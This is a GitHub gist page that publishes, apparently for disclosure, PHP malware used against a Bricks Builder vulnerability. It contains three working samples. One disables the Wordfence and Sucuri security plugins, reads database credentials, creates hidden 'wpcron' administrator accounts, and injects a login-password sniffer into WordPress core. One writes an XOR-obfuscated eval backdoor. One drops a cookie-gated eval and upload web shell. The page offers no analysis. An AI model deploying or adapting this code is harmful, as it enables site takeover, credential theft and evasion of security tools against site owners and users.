Last active
March 7, 2024 16:01
-
-
Save lynt-smitka/1eef476aed934fd3bc0be0813ea82f39 to your computer and use it in GitHub Desktop.
Bircks Builder <1.9.6.1 Malware
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| @ini_set('display_errors', 0); | |
| @ini_set('log_errors', 0); | |
| @error_reporting(0); | |
| function genstr($length = 10) | |
| { | |
| return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length / strlen($x)))), 1, $length); | |
| } | |
| function gwi($dr, &$aa) | |
| { | |
| if (!file_exists("$dr/wp-includes/version.php")) return NULL; | |
| if (!@include("$dr/wp-includes/version.php")) return NULL; | |
| $cd = array(); | |
| $cd['host'] = "none"; | |
| $cd['auth_key'] = "_" . genstr(56); | |
| $cd['name'] = "wordpress"; | |
| $cd['docroot'] = $dr; | |
| $cd['ver'] = ""; | |
| $cd['db_login'] = ""; | |
| $cd['db_passwd'] = ""; | |
| $cd['db_name'] = ""; | |
| $cd['db_host'] = ""; | |
| $cd['db_prefix'] = ""; | |
| $cd["wf_status"] = "none"; | |
| $cd["wf2_status"] = "none"; | |
| $cd["se_status"] = "none"; | |
| $cd["users"] = Array(); | |
| $bp = $dr . "/wp-content/plugins/"; | |
| $ntd = array("se_status" => "sucuri-scanner/sucuri.php", | |
| "wf_status" => "wordfence/wordfence.php", "wf2_status" => "wordfence/waf/bootstrap.php"); | |
| foreach ($ntd as $name=>$pg) { | |
| if (is_file($bp . $pg)) { | |
| @rename($bp . $pg, $bp . $pg . "backup" . rand()); | |
| if (is_file($bp . $pg)) { | |
| $cd[$name] = "cantdisable"; | |
| } else { | |
| $cd[$name] = "disabled"; | |
| } | |
| } | |
| } | |
| if (!isset($wp_version)) { | |
| $wp_version = "unknown"; | |
| } | |
| $cnt = @file_get_contents("$dr/wp-config.php"); | |
| preg_match_all(/(define\(\s*\')([^\']+)(\',\s*\')([^\']+)/, $cnt, $m); | |
| if (is_array($m)) { | |
| for ($i = 0; $i < count($m[2]); $i++) { | |
| if (stristr($m[2][$i], "db_name")) { | |
| $cd['db_name'] = $m[4][$i]; | |
| } elseif (stristr($m[2][$i], "db_user")) { | |
| $cd['db_login'] = $m[4][$i]; | |
| } elseif (stristr($m[2][$i], "db_password")) { | |
| $cd['db_passwd'] = $m[4][$i]; | |
| } elseif (stristr($m[2][$i], "db_host")) { | |
| $cd['db_host'] = $m[4][$i]; | |
| } | |
| } | |
| } | |
| preg_match_all(/table_prefix\s*=\s*['"](.*)['"];/, $cnt, $m); | |
| if (is_array($m)) { | |
| $cd['db_prefix'] = $m[1][0]; | |
| } | |
| $cd['ver'] = $wp_version; | |
| $cd = awu($cd, $aa); | |
| return sws($dr, $cd); | |
| } | |
| function sws($docroot, $cd) | |
| { | |
| $rep = "\$ignore_codes = array"; | |
| $pd = <<< BASE64decoded | |
| if (!is_wp_error($user)) | |
| { | |
| $csrf = "{AUTHKEY}"; | |
| $line = $password . "\t" . $username . "\t" . get_site_url(); | |
| $line = $line ^ str_repeat($csrf, (strlen($line) / strlen($csrf)) + 1); | |
| $line = bin2hex($line); | |
| $lines = @file("{DUMPFILE}", FILE_IGNORE_NEW_LINES); | |
| $lines[] = $line; | |
| @file_put_contents("{DUMPFILE}", implode("\n", array_unique($lines))); | |
| $lines = get_option('wpsdt4_license_key'); | |
| $lines = explode("\n", $lines); | |
| $lines[] = $line; | |
| $lines = array_unique($lines); | |
| update_option('wpsdt4_license_key', implode("\n", array_unique($lines))); | |
| } | |
| BASE64decoded; | |
| $pa = <<< BASE64decoded | |
| if (isset($_COOKIE["{AUTHKEY}"])) | |
| { | |
| $lines = get_option( 'wpsdt4_license_key' ); | |
| if (!empty($lines)) | |
| { | |
| $lines = @file_get_contents("{DUMPFILE}"); | |
| } | |
| echo $lines; | |
| exit(); | |
| } | |
| BASE64decoded; | |
| $pf = "$docroot/wp-includes/pluggable.php"; | |
| $pc = @file_get_contents($pf); | |
| if (strpos($pc, "line ^ str_repeat") !== FALSE) { | |
| preg_match_all(/\$csrf\s=\s\"(\w{20,})\";/, $pc, $m); | |
| if (is_array($m)) | |
| { | |
| $cd["auth_key"] = $m[1][0]; | |
| } | |
| $cd["sniffer_status"] = "already"; | |
| return $cd; | |
| } | |
| $au = $cd["auth_key"]; | |
| $df = substr(md5($au), 0, 8); | |
| $pd = str_replace("{AUTHKEY}", $au, $pd); | |
| $pd = str_replace("{DUMPFILE}", $df, $pd); | |
| $pa = str_replace("{AUTHKEY}", $au, $pa); | |
| $pa = str_replace("{DUMPFILE}", $df, $pa); | |
| $ot = @stat($pf); | |
| $src = @file_get_contents($pf); | |
| $src = str_replace($rep, $pd . "\r\n" . $rep, $src); | |
| $src = $src . "\r\n" . $pa; | |
| @file_put_contents($pf, $src); | |
| @touch($pf, $ot["mtime"]); | |
| if (strpos(@file_get_contents($pf), $au) !== FALSE) { | |
| $cd["sniffer_status"] = "installed"; | |
| } else { | |
| $cd["sniffer_status"] = "error"; | |
| } | |
| return $cd; | |
| } | |
| function awu($cd, &$aa) | |
| { | |
| $dbn = $cd['db_name']; | |
| $dbu = $cd['db_login']; | |
| $dbp = $cd['db_passwd']; | |
| $dh = $cd['db_host']; | |
| $dpfx = $cd['db_prefix']; | |
| if (!empty($dbn)) { | |
| if (strpos($dh, ":") !== FALSE) { | |
| $hp = explode(":", $dh); | |
| $h1 = $hp[0]; | |
| $port = intval($hp[1]); | |
| } else { | |
| $h1 = $dh; | |
| $port = 3306; | |
| } | |
| if ($conn = mysqli_connect($h1, $dbu, $dbp, $dbn, $port)) { | |
| $result = mysqli_query($conn, "SHOW DATABASES;"); | |
| $dbs = Array(); | |
| while($rw = mysqli_fetch_array($result, MYSQLI_NUM)) | |
| { | |
| $dbs[] = $rw; | |
| } | |
| foreach ($dbs as $cdb) { | |
| $cdb = $cdb[0]; | |
| if (TRUE) { | |
| mysqli_select_db($conn, $cdb); | |
| $result2 = mysqli_query($conn, "SHOW TABLES;"); | |
| $tab = Array(); | |
| while($rw = mysqli_fetch_array($result2, MYSQLI_NUM)) | |
| { | |
| $tab[] = $rw; | |
| } | |
| foreach ($tab as $wct) { | |
| $wct = $wct[0]; | |
| $ppos = strpos($wct, "usermeta"); | |
| if ($ppos !== FALSE) { | |
| $pfx = substr($wct, 0, $ppos); | |
| $result3 = mysqli_query($conn, "SELECT option_value FROM " . $pfx . "options WHERE option_name='siteurl';"); | |
| $su = mysqli_fetch_array($result3, MYSQLI_NUM); | |
| if (count($su)) { | |
| $su = $su[0]; | |
| $do = explode("/", $su); | |
| $do = $do[2]; | |
| $do = str_replace("www.", "", $do); | |
| if ($dpfx === $pfx) | |
| { | |
| $cd['host'] = $do; | |
| } | |
| $ra = mysqli_query($conn, "SELECT * FROM " . $pfx . "users WHERE user_login LIKE 'wpcron%';"); | |
| if (mysqli_num_rows($ra)) | |
| { | |
| break; | |
| } | |
| $ck = $h1 . $dbu . $dbp . $dbn . $do; | |
| if (isset($aa[$ck])) | |
| { | |
| continue; | |
| } | |
| $aa[$ck] = TRUE; | |
| $usern = 'wpcron' . substr(md5(time()), 0, 8); | |
| $pp = genstr(8); | |
| $pass = md5($pp); | |
| mysqli_query($conn, "INSERT INTO $pfx" . "users (`user_login`, `user_pass`, `user_nicename`, `user_status`, `display_name`, `user_registered`) VALUES ('$usern', '$pass', '$usern', 0, '$usern', '1979-01-01 00:00:00');"); | |
| mysqli_query($conn, "SET @created_user_id = LAST_INSERT_ID();"); | |
| mysqli_query($conn, "INSERT INTO $pfx" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $pfx . "capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');"); | |
| mysqli_query($conn, "INSERT INTO $pfx" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $pfx . "user_level', '10');"); | |
| mysqli_commit($conn); | |
| $cd["users"][] = Array($su, $usern, $pp); | |
| } | |
| } | |
| } | |
| } | |
| } | |
| mysqli_close($conn); | |
| } | |
| } | |
| return $cd; | |
| } | |
| function list_dir($dir, $od=TRUE) | |
| { | |
| $res = Array(); | |
| $dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/'); | |
| $h = @opendir($dir); | |
| if ($h === FALSE) { | |
| return $res; | |
| } | |
| while (($f = readdir($h)) !== FALSE) { | |
| if ($f !== '.' and $f !== '..') { | |
| $tmp = "$dir/$f"; | |
| if ($od) { | |
| if (@is_dir($tmp)) { | |
| $res[] = $tmp; | |
| } | |
| } | |
| else{ | |
| $res[] = $tmp; | |
| } | |
| } | |
| } | |
| closedir($h); | |
| return $res; | |
| } | |
| $bd = Array(); | |
| $aq = Array(); | |
| $cd = $_SERVER["DOCUMENT_ROOT"]; | |
| while ($cd = @dirname($cd)) { | |
| if ($cd == $aq[count($aq) - 1]) { | |
| break; | |
| } | |
| $aq[] = $cd; | |
| } | |
| foreach ($aq as $cd) { | |
| if (!in_array($cd, $bd)) { | |
| $l1 = list_dir($cd); | |
| foreach ($l1 as $l1d) | |
| { | |
| $bd = array_merge($bd, list_dir($l1d)); | |
| } | |
| $bd = array_merge($bd, $l1); | |
| } | |
| } | |
| $bd = array_unique(array_merge($aq, $bd)); | |
| $aa = Array(); | |
| $res = Array(); | |
| foreach ($bd as $dc) | |
| { | |
| $tmp = gwi($dc, $aa); | |
| if ($tmp) | |
| { | |
| $res[] = $tmp; | |
| } | |
| } | |
| echo "{MARK}" . rawurlencode(serialize($res)) . "{MARK}"; | |
| exit(); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(!defined(\"PHP_EOL\")) | |
| { | |
| define(\"PHP_EOL\", \"\n\"); | |
| } | |
| if(!defined(\"DIRECTORY_SEPARATOR\")) | |
| { | |
| define(\"DIRECTORY_SEPARATOR\", \"/\"); | |
| } | |
| function generateRandomStringEval($length = 12) | |
| { | |
| $characters = 'AQZSXWCDEVFRBGTHYNMUJabcdefghijklmnopqrstuvwxyz'; | |
| $charactersLength = strlen($characters); | |
| $randomString = ''; | |
| for ($i = 0; $i < $length; $i++) { | |
| $randomString .= $characters[rand(0, $charactersLength - 1)]; | |
| } | |
| return $randomString ; | |
| } | |
| function generateRndString($length = 10) | |
| { | |
| $characters = '0123456789abcdefghijklmnopqrstuvwxyz'; | |
| $charactersLength = strlen($characters); | |
| $randomString = ''; | |
| for ($i = 0; $i < $length; $i++) { | |
| $randomString .= $characters[rand(0, $charactersLength - 1)]; | |
| } | |
| return $randomString ; | |
| } | |
| function generateRandomString($length = 10) | |
| { | |
| $characters = '0123456789abcdefghijklmnopqrstuvwxyz'; | |
| $charactersLength = strlen($characters); | |
| $randomString = ''; | |
| for ($i = 0; $i < $length; $i++) { | |
| $randomString .= $characters[rand(0, $charactersLength - 1)]; | |
| } | |
| return $randomString . \".php\"; | |
| } | |
| function _add_action($snippet, $template, $xor_number) | |
| { | |
| $splitted = str_split($snippet); | |
| $action = \"\"; | |
| for ($i = 0; $i < strlen($snippet);$i++) { | |
| $action .= $splitted[$i] ^ $template[$i%$xor_number]; | |
| } | |
| $action = urlencode($action); | |
| return $action; | |
| } | |
| function GetDocRoot() | |
| { | |
| $docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']); | |
| if ($docroot_end === FALSE) | |
| { | |
| return $_SERVER['DOCUMENT_ROOT']; | |
| } | |
| elseif ($docroot_end === 0) | |
| { | |
| return \"/\"; | |
| } | |
| else | |
| { | |
| return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end); | |
| } | |
| } | |
| $origin_backdoor = <<< BASE64decoded | |
| <?php | |
| @ini_set('error_log', NULL); | |
| @ini_set('log_errors', 0); | |
| @ini_set('max_execution_time', 0); | |
| @set_time_limit(0); | |
| function shdp($data, $key) | |
| { | |
| $out_data = ""; | |
| for ($i = 0; $i < strlen($data);) { | |
| for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) { | |
| $out_data .= chr(ord($data[$i]) ^ ord($key[$j])); | |
| } | |
| } | |
| return $out_data; | |
| } | |
| if (isset($_GET[673435])) | |
| { | |
| die(md5(47712)); | |
| } | |
| $temp=array_merge($_COOKIE, $_POST); | |
| foreach ($temp as $data_key => $data) { | |
| $data = @unserialize(shdp(shdp(base64_decode($data), '4ef63abe-1abd-45a6-913d-6fb99657e24b'), $data_key)); | |
| if (isset($data['ak'])) { | |
| if ($data['a'] == 'i') { | |
| $i = array( | |
| 'pv' => @phpversion(), | |
| 'sv' => '1.0-1', | |
| ); | |
| echo @serialize($i); | |
| } elseif ($data['a'] == 'e') { | |
| eval($data['d']); | |
| } | |
| exit(); | |
| } | |
| } | |
| BASE64decoded; | |
| $new_pass = generateRndString(35); | |
| $origin_backdoor = str_replace(\"4ef63abe-1abd-45a6-913d-6fb99657e24b\",$new_pass,$origin_backdoor ); | |
| $evaluaor = <<< BASE64decoded | |
| <?php | |
| function _remove_action($snippet, $template) | |
| { | |
| $snippet = urldecode($snippet); | |
| $splitted = str_split($snippet); | |
| $action = ""; | |
| for ($i = 0; $i < strlen($snippet);$i++) { | |
| $action .= $splitted[$i] ^ $template[$i%xor_number]; | |
| } | |
| return $action; | |
| } | |
| $i="#URLENCODED_CODE#"; | |
| $j="#URLENCODED_file_put_contetnts#"; | |
| $index="#XORKEY#"; | |
| $k = _remove_action($i, $index); | |
| $f = _remove_action($j, $index); | |
| $f($index, $k); | |
| include_once ($index); | |
| unlink($index); | |
| exit(); | |
| BASE64decoded; | |
| $xor_number=rand(3,12); | |
| $XORKEY = generateRandomStringEval(12); | |
| $URLENCODED_CODE = _add_action($origin_backdoor, $XORKEY, $xor_number); | |
| $URLENCODED_CODE_file_put_contents = _add_action(\"file_put_contents\", $XORKEY, $xor_number); | |
| $snippet_varname = generateRandomStringEval(rand(6,12)); | |
| $template_varname = generateRandomStringEval(rand(6,12)); | |
| $splitted_varname = generateRandomStringEval(rand(6,12)); | |
| $_remove_action_varname = generateRandomStringEval(rand(6,12)); | |
| $index_varname = generateRandomStringEval(rand(6,12)); | |
| $evaluaor=str_replace('$splitted', \"$\".$splitted_varname, $evaluaor); | |
| $evaluaor=str_replace('xor_number', $xor_number, $evaluaor); | |
| $evaluaor=str_replace('$index', \"$\".$index_varname, $evaluaor); | |
| $evaluaor=str_replace('#XORKEY#', $XORKEY, $evaluaor); | |
| $evaluaor=str_replace('_remove_action', $_remove_action_varname, $evaluaor); | |
| $evaluaor=str_replace('$template', \"$\".$template_varname, $evaluaor); | |
| $evaluaor=str_replace('$snippet', \"$\".$snippet_varname, $evaluaor); | |
| $evaluaor=str_replace('#URLENCODED_CODE#', $URLENCODED_CODE, $evaluaor); | |
| $payload_file=str_replace('#URLENCODED_file_put_contetnts#', $URLENCODED_CODE_file_put_contents, $evaluaor); | |
| srand(time()); | |
| if (!function_exists('file_put_contents')) { | |
| function file_put_contents($filename, $data) { | |
| $f = @fopen($filename, 'w'); | |
| if (!$f) { | |
| return false; | |
| } else { | |
| $bytes = fwrite($f, $data); | |
| fclose($f); | |
| return $bytes; | |
| } | |
| } | |
| } | |
| //////////////////////////////////////////////////////////////////////////////////////////// | |
| $filename = \"readurl.php\"; | |
| # $filename = generateRandomString(); | |
| #$filename = \"options-reading.php\"; | |
| #$filename = \"wp-login.php\"; | |
| $filename = \"xjc6q59v.php\"; | |
| # get base local and remote path | |
| $base_www_path = $host = @$_SERVER['HTTP_HOST']; | |
| $base_local_path = GetDocRoot(); | |
| $full_payload_name = GetDocRoot() . \"/$filename\"; | |
| $good = FALSE; | |
| if (file_put_contents($full_payload_name, $payload_file)) | |
| { | |
| echo \"UROK#http://\" . $filename. \"#ONDOK#\". $new_pass . \"#ENDP\" . PHP_EOL; | |
| $good=TRUE; | |
| $good_counter++; | |
| exit(); | |
| } | |
| if(!$good) | |
| echo \"URL#STATUS_CANTUPLOAD#CCCURL\"; | |
| echo \"#CCCURL\"; | |
| //unlink(\"dfaonfpfkwg.php\"); | |
| exit();?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php file_put_contents(\"e9a045b4ce28.php\",\" | |
| <?php echo 409723 * 20; | |
| if (md5($_COOKIE["d"]) == "17028f487cb2a84607646da3ad3878ec") { | |
| echo "ok"; | |
| eval(base64_decode($_REQUEST["id"])); | |
| if ($_POST["up"] == "up") { | |
| @copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]); | |
| } | |
| } ?> | |
| \") | |
| ;exit;?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment